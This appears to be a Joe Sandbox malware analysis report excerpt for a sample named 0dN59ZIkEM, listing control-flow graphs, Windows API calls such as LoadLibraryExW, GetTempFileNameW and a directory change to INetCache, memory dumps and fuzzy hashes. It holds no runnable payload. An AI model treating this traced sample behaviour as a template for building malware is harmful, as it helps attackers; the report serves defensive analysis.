                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CountTick$wsprintf
                                                                                                                                                                                                                                      • String ID: ... %d%%$G8@
                                                                                                                                                                                                                                      • API String ID: 551687249-649311722
                                                                                                                                                                                                                                      • Opcode ID: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
                                                                                                                                                                                                                                      • Instruction ID: 27b76012fb03590ae9ad79c5aacab076c27bed8bf8d9d3eaec1048eb1f993e7f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F519D71900219DBCB11DF65DA446AF7FA8AB40766F14417FFD00BB2C1D7788E408BA9
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 641 406864-406884 GetSystemDirectoryW 642 406886 641->642 643 406888-40688a 641->643 642->643 644 40689b-40689d 643->644 645 40688c-406895 643->645 646 40689e-4068d1 wsprintfW LoadLibraryExW 644->646 645->644 647 406897-406899 645->647 647->646
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004068B6
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                                                      • API String ID: 2200240437-1946221925
                                                                                                                                                                                                                                      • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                                                                                      • Instruction ID: a3f2ba33ef282063e8bef789480649f163c4345fe71bbebd74fcccbb96bf8ece
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8DF0F671511119ABCB14BF64ED0DF9B376CAB00305F51447AAA46F10D0EB7CAA69CBA8
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 648 406026-406032 649 406033-406067 GetTickCount GetTempFileNameW 648->649 650 406076-406078 649->650 651 406069-40606b 649->651 653 406070-406073 650->653 651->649 652 40606d 651->652 652->653
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00406044
                                                                                                                                                                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,004034F5,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 0040605F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                                      • API String ID: 1716503409-1331003597
                                                                                                                                                                                                                                      • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                                                                                      • Instruction ID: f6a7e3e28ef10c8b5a356f390c602f787c019cac788ca5903e6ee53affe9a5d3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92F09076B40204BBEB00CF59ED05E9EB7BCEB95750F11803AEA05F7140E6B09D648768
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 737 4015c1-4015d5 call 402da6 call 405e81 742 401631-401634 737->742 743 4015d7-4015ea call 405e03 737->743 745 401663-4022f6 call 401423 742->745 746 401636-401655 call 401423 call 406507 SetCurrentDirectoryW 742->746 750 401604-401607 call 405ab5 743->750 751 4015ec-4015ef 743->751 760 402c2a-402c39 745->760 761 40292e-402935 745->761 746->760 764 40165b-40165e 746->764 762 40160c-40160e 750->762 751->750 754 4015f1-4015f8 call 405ad2 751->754 754->750 768 4015fa-401602 call 405a38 754->768 761->760 766 401610-401615 762->766 767 401627-40162f 762->767 764->760 770 401624 766->770 771 401617-401622 GetFileAttributesW 766->771 767->742 767->743 768->762 770->767 771->767 771->770
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
                                                                                                                                                                                                                                        • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
                                                                                                                                                                                                                                        • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                                                                        • Part of subcall function 00405A38: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache, xrefs: 00401640
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
                                                                                                                                                                                                                                      • API String ID: 1892508949-3483070565
                                                                                                                                                                                                                                      • Opcode ID: f05bda5ccba1a2e5aa416980a25588bb69072d489e09a94885b650edebede0fb
                                                                                                                                                                                                                                      • Instruction ID: 5432bfb841e0ad51ec8b230ce72dc3ef5087fba7ddd62730da8486a2a7133ac3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f05bda5ccba1a2e5aa416980a25588bb69072d489e09a94885b650edebede0fb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F110331504100EBCF216FA0CD40A9F36A0EF14328B24093BF941B12F1DA3E4A829B8D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 778 407033-407039 779 40703b-40703d 778->779 780 40703e-40705c 778->780 779->780 781 40726a-40727f 780->781 782 40732f-40733c 780->782 783 407281-407297 781->783 784 407299-4072af 781->784 785 407366-40736a 782->785 788 4072b2-4072b9 783->788 784->788 786 4073ca-4073dd 785->786 787 40736c-40738d 785->787 793 4072e6-4072ec 786->793 791 4073a6-4073b9 787->791 792 40738f-4073a4 787->792 789 4072e0 788->789 790 4072bb-4072bf 788->790 789->793 794 4072c5-4072dd 790->794 795 40746e-407478 790->795 797 4073bc-4073c3 791->797 792->797 801 406a91 793->801 802 407499 793->802 794->789 798 407484-407497 795->798 799 407363 797->799 800 4073c5 797->800 803 40749c-4074a0 798->803 799->785 809 407348-407360 800->809 810 40747a 800->810 805 406a98-406a9c 801->805 806 406bd8-406bf9 801->806 807 406b3d-406b41 801->807 808 406bad-406bb1 801->808 802->803 805->798 815 406aa2-406aaf 805->815 806->781 813 406b47-406b60 807->813 814 4073ed-4073f7 807->814 811 406bb7-406bcb 808->811 812 4073fc-407406 808->812 809->799 810->798 817 406bce-406bd6 811->817 812->798 818 406b63-406b67 813->818 814->798 815->802 816 406ab5-406afb 815->816 819 406b23-406b25 816->819 820 406afd-406b01 816->820 817->806 817->808 818->807 821 406b69-406b6f 818->821 824 406b33-406b3b 819->824 825 406b27-406b31 819->825 822 406b03-406b06 GlobalFree 820->822 823 406b0c-406b1a GlobalAlloc 820->823 826 406b71-406b78 821->826 827 406b99-406bab 821->827 822->823 823->802 828 406b20 823->828 824->818 825->824 825->825 829 406b83-406b93 GlobalAlloc 826->829 830 406b7a-406b7d GlobalFree 826->830 827->817 828->819 829->802 829->827 830->829
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
                                                                                                                                                                                                                                      • Instruction ID: a7cd93b13192ddc82b920214167f5e61206f8c8658b3f9d41a1d2146159b2bab
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7DA15571E04229CBDB28CFA8C8446ADBBB1FF44305F14816ED856BB281C7786A86DF45
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
                                                                                                                                                                                                                                      • Instruction ID: 8a2c3c043c9bb5ba2b5721dff60c2e2798a6d81db984abdc297d3eb4e69e55d3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ebae6c99bd50000eb285df6155aedf615db6897555c34448d2050622d285009a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11911170D04229CBEF28CF98C8947ADBBB1FB44305F14816ED856BB291C7786A86DF45
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
                                                                                                                                                                                                                                      • Instruction ID: 00773887ea3243dfb52df8404d42644f62a25abb174058b9e5a1e26f950428c6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27813671D04229CFDF24CFA8C8847ADBBB1FB44305F24816AD856BB281C7786A86DF55
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
                                                                                                                                                                                                                                      • Instruction ID: 0eb50412ba17cbd686f9e43e0b7d85c943a315db4d9133bb66c32ce13943f697
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7813471E04229DBDF24CFA9C8447ADBBB0FB44305F24816ED856BB281C7786A86DF45
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
                                                                                                                                                                                                                                      • Instruction ID: 6da958b06032b63f13a44664be3ec753dd66a0d9f0ebc92e4dfa00afb32c2233
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89603fd8b8eecea839b3cd3a2d66b7f9e848fabc5245f70b4c88dad99cb78f07
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 677123B1D04229CBDF24CFA8C8847ADBBF1FB44305F14816AE856B7281D7386A86DF45
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451161667.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_0dN59ZIkEM.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
                                                                                                                                                                                                                                      • Instruction ID: e79abdf9917e1b0942e39fca47e1ede282e873968176da0823b4a4e8bca0445d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9937c35aa34803c0ec185ece5e84ac71bfec761af00328b89af2ba093ab12211
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A712371E04229CBDB28CF98C884BADBBB1FB44305F14816EE856B7291C7786986DF45
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1451027287.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451006786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451055146.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1451069987.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
